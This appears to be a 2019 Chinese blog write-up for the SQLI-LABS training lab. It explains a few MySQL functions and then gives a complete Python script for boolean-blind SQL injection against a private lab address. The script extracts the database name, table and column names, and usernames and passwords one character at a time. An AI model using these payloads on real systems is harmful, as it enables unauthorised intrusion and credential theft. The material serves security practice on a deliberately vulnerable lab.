SQLI-LABS LESS5

Mysql重要函数介绍

ascii(char)

​ - char:返回返回对应的ascii码的字符

substr(str,position,length)

​ - str:主字符串

​ - position:指定从第几个字符串开始

​ - length:需要获取的长度

length(str):返回str的字符串长度

database():查看当前使用的数据库库名

count():返回查询语句的结果数量

重要关键词

limit m,n:返回查询结果的m~m+n项

- m:从第几条开始,第一条位0
- n:指定长度

脚本代码

import requests

url = 'http://192.168.115.130/sqli-labs-master/Less-8/?id='

# 爆数据库长度
db_length = 0
for i in range(1, 20):
    db_payload = "1' and (length(database())=%d) --+" % i
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        print("数据库长度为:", i)
        db_length = i
        break

# 爆数据库名称
db_name = ''
for i in range(1, db_length+1):
    for j in range(95, 123):
        db_payload = "1' and (left(database(),%d)='%s') --+" % (i, db_name+chr(j))
        r = requests.get(url+db_payload)
        if "You are in" in r.text:
            db_name = db_name+chr(j)
print("数据库名称为:", db_name)

# 爆表数量
table_num = 0
for i in range(100):
    db_payload = "1' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+" %(db_name, i)
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        table_num = i
        break
print("数据库当前有%d张表" % table_num)

# 爆表名称
tables_name = []
for i in range(table_num):
    k = 1
    flag = 0
    table_name = ''
    while flag == 0:
        for j in range(95, 123):
            db_payload = "1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d --+" % (i, k, j)
            r = requests.get(url+db_payload)
            if "You are in" in r.text:
                k = k+1
                table_name = table_name+chr(j)
                break
            elif j == 122:
                flag = 1
                tables_name.append(table_name)
                break

# print("当前扫描出的表:", end='')
# print(','.join(tables_name))
# while True:
#     print("请输入要扫描的表:", end='')
#     table = input()
#     if table in tables_name:
#         break
#     print("//// 输入错误,请重新输入 ////")

table_name = 'users'
column_num = 0
# 爆字段数量
for i in range(100):
    db_payload = ("1' and "
    "(select count(column_name) from information_schema.columns where table_schema=database() and table_name='%s')"
    "=%d --+") % (table_name, i)
    r = requests.get(url+db_payload)
    if 'You are in' in r.text:
        column_num = i
        break
print("该表共有", column_num, "个字段:", end='')

# 爆字段名称
columns_name = []
for i in range(column_num):
    column_name = ''
    k = 1
    flag = 0
    while flag == 0:
        for j in range(95, 123):
            db_payload = """1' and
            ascii(substr((select column_name from information_schema.columns
            where table_schema=database() and table_name='%s'
            limit %d,1 )
            ,%d,1))=%d --+""" % (table_name, i, k, j)
            r = requests.get(url+db_payload)
            if "You are in" in r.text:
                k = k+1
                column_name = column_name+chr(j)
                break
            elif j == 122:
                flag = 1
                columns_name.append(column_name)
                break
print(','.join(columns_name))


columns_name = ['id', 'username', 'password']
columns_num = 3
data_num = 0

# 爆数据数量
for i in range(20):
    db_payload = "1' and (select count(%s) from %s)=%d --+" % (columns_name[0], table_name, i)
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        data_num = i
        print("该表共有", data_num, "个数据")
        break

user_id = []
user_name = []
user_pw = []
# 爆数据结果
for i in range(data_num):
    # id
    for k in range(20):
        db_payload = "1' and (select %s from %s limit %d,1)=%d --+" % (columns_name[0], table_name, i, k)
        r = requests.get(url+db_payload)
        if "You are in" in r.text:
            user_id.append(k)
            print("%2d" % k, end=' ')
            break
    # username
    un = ''
    flag = 0
    j = 1
    while flag == 0:
        for k in range(48, 123):
            if k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):
                continue
            db_payload = "1' and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (columns_name[1], table_name, i, j, k)
            r = requests.get(url+db_payload)
            if "You are in" in r.text:
                un += chr(k)
                j += 1
                break
            if k == 122:
                flag = 1
                user_name.append(un)
                print("%10s" % un, end=' ')
                break
    # password
    pw = ''
    flag = 0
    j = 1
    while flag == 0:
        for k in range(33, 123):
            if k not in (33, 45, 64) and k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):
                continue
            db_payload = "1' and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (columns_name[2], table_name, i, j, k)
            r = requests.get(url + db_payload)
            if "You are in" in r.text:
                pw += chr(k)
                j += 1
                break
            if k == 122:
                flag = 1
                user_pw.append(pw)
                print("  ", pw)
                break

部分运行结果:

点击查看SQLI-LBAS系列

posted @ 2019-07-31 20:24  Dozeer  阅读(448)  评论(0编辑  收藏  举报
Live2D